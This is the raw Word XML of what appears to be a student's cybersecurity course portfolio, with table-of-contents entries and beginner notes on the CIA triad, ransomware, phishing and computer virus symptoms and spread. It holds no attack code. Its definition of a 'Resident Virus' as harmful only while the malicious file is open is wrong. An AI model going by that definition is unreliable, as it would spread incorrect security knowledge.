            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure Shell (SSH)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777214 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="111B7835" w14:textId="72DD73A7" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777215" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Network Security (week 5-8)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777215 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65DF4F89" w14:textId="7EE5F411" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777216" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Security Concepts (week 9-10)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777216 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42FB2325" w14:textId="4825693A" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777217" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777217 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="281A1B97" w14:textId="37801D41"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4777168"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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4777169"/>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I also like to learn by watching sometimes. I am subscribed to so many IT YouTube channels that provide basics for the IT industry. Some of my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>favorite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> YouTube channels are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F9BD5D" w14:textId="18F86783" w:rsidR="009107C8" w:rsidRPr="00A73FE2" w:rsidRDefault="00000000"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000000"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserv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4777170"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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5325E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc114777171"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exercises &amp; Challenges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="72A3BC82" w14:textId="7D9082C1" w:rsidR="006E0449" w:rsidRPr="00A73FE2" w:rsidRDefault="006E0449" w:rsidP="006E0449">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222FBE72" w14:textId="77777777" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="006E0449">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45258210" w14:textId="77777777" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFB8BDC" w14:textId="41F5A0D6" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc114777172"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 1.3</w:t>
      </w:r>
      <w:r w:rsidR="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="002C1E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r w:rsidR="006F531D" w:rsidRPr="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
      <w:r w:rsidR="006F531D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0728060A" w14:textId="257C6E5F" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A309F4" w14:textId="4F0A2A0B" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc114777173"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The CIA triad.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3A0B6F37" w14:textId="056F5FE8" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confidentiality</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15DF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00421E7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15DF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00421E7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as known as the CIA triad, is a concept that guides policies for the security in any environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF09F8" w14:textId="4A21B5BB" w:rsidR="00A15DF8" w:rsidRDefault="00421E7B" w:rsidP="00421E7B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A15DF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confidentiality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45A62C" w14:textId="72CAC9E0" w:rsidR="00421E7B" w:rsidRDefault="00421E7B" w:rsidP="00421E7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is to protect all the sensitive data from being reached by the wrong people. The privacy is an integral part in any organization. Therefore, c</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15DF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onfidentiality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exists to guide the security engineers for a safe environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF9BF8" w14:textId="33FF7434" w:rsidR="00421E7B" w:rsidRDefault="00421E7B" w:rsidP="00421E7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A19B313" w14:textId="62912634" w:rsidR="00421E7B" w:rsidRDefault="00421E7B" w:rsidP="00421E7B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E7B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Integrity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573732D" w14:textId="2A3B3FDD" w:rsidR="00421E7B" w:rsidRDefault="00421E7B" w:rsidP="00421E7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is the consistency and accuracy of the data. </w:t>
      </w:r>
      <w:r w:rsidR="00BA0779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It makes sure that the data is not being changed by any outsiders. It must be only changed by the authorized people in any organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DC911" w14:textId="31E76B77" w:rsidR="00BA0779" w:rsidRDefault="00BA0779" w:rsidP="00421E7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1612895A" w14:textId="18B8435D" w:rsidR="00BA0779" w:rsidRDefault="00BA0779" w:rsidP="00BA0779">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E7B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD1229" w14:textId="000AA7C4" w:rsidR="00BA0779" w:rsidRPr="00C8356F" w:rsidRDefault="00BA0779" w:rsidP="00BA0779">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">means that the data must be available and accessible for the authorized people all the time. It stops the attackers from removing </w:t>
      </w:r>
      <w:r w:rsidR="00C8356F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00C8356F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D132A">
        <w:t>or stopping the servers in any way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41967C25" w14:textId="77777777" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="006E0449">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF528DD" w14:textId="60F21181"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US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352B97A4" w14:textId="0FBD3D55" w:rsidR="006E0449" w:rsidRPr="00A73FE2" w:rsidRDefault="006E0449" w:rsidP="006E0449">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc114777174"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>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lastRenderedPageBreak/>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4C9DB9FD"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r w:rsidR="002C1E86">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002C1E86" w:rsidRPr="002C1E86">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What Was WannaCry? | WannaCry Ransomware, n.d.)</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7" w:name="_Toc114777175"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>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lastRenderedPageBreak/>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6125D70C" w:rsidR="00567C5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w:t>
      </w:r>
      <w:r w:rsidR="008634D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e network and pay attention to all the emails received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D3401" w14:textId="77777777" w:rsidR="00AB52F3" w:rsidRPr="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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5AA50CD4" w14:textId="21CB6A07" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="006D41D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc114777176"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Viruses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="13AF483E" w14:textId="63E786EF" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="006D41D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer virus is a </w:t>
      </w:r>
      <w:r w:rsidR="007F2BF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type of malicious software that tends to harm the system in some way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44305F2F" w14:textId="4A75FB65" w:rsidR="007F2BF7" w:rsidRDefault="007F2BF7" w:rsidP="006D41D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>How would you know if your system is being infected by a virus?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A3559" w14:textId="4E43A29A" w:rsidR="007F2BF7" w:rsidRDefault="007F2BF7" w:rsidP="007F2BF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Viruses usually affects the performance of the system. Therefore, if you notice that your system is slower </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> normal, there is probably a malicious virus inside your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F222505" w14:textId="77777777" w:rsidR="000A5D56" w:rsidRDefault="007F2BF7" w:rsidP="007F2BF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Viruses can </w:t>
      </w:r>
      <w:r w:rsidR="000A5D56">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>force the system to close itself randomly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3FD1FE" w14:textId="77777777" w:rsidR="000A5D56" w:rsidRDefault="000A5D56" w:rsidP="007F2BF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer viruses can send out emails from your account without your permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EA841" w14:textId="77777777" w:rsidR="000A5D56" w:rsidRDefault="000A5D56" w:rsidP="000A5D56">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What are the ways for the virus to spread?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266B5CC" w14:textId="77777777" w:rsidR="00D0186C" w:rsidRDefault="000A5D56" w:rsidP="000A5D56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USB drivers used to be the most popular way for the virus to be spread. Nowadays, the chance of it being spread through the internet is much higher.</w:t>
      </w:r>
      <w:r w:rsidR="00D0186C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Such as, suspicious emails, malicious websites, files that you downloaded to your system, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A28D9" w14:textId="77777777" w:rsidR="00D0186C" w:rsidRDefault="00D0186C" w:rsidP="00D0186C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Types of computer viruses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B89364C" w14:textId="4C9D15D3" w:rsidR="007F2BF7" w:rsidRDefault="00D0186C" w:rsidP="00D0186C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resident Virus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B28ED" w14:textId="7D10142A" w:rsidR="00D0186C" w:rsidRPr="00D0186C" w:rsidRDefault="00D0186C" w:rsidP="00D0186C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This type of malware is only hurting your system when the malicious file is open. When you close the </w:t>
      </w:r>
      <w:r w:rsidR="00283E33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>files,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it stops infecting</w:t>
      </w:r>
      <w:r w:rsidR="00283E33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
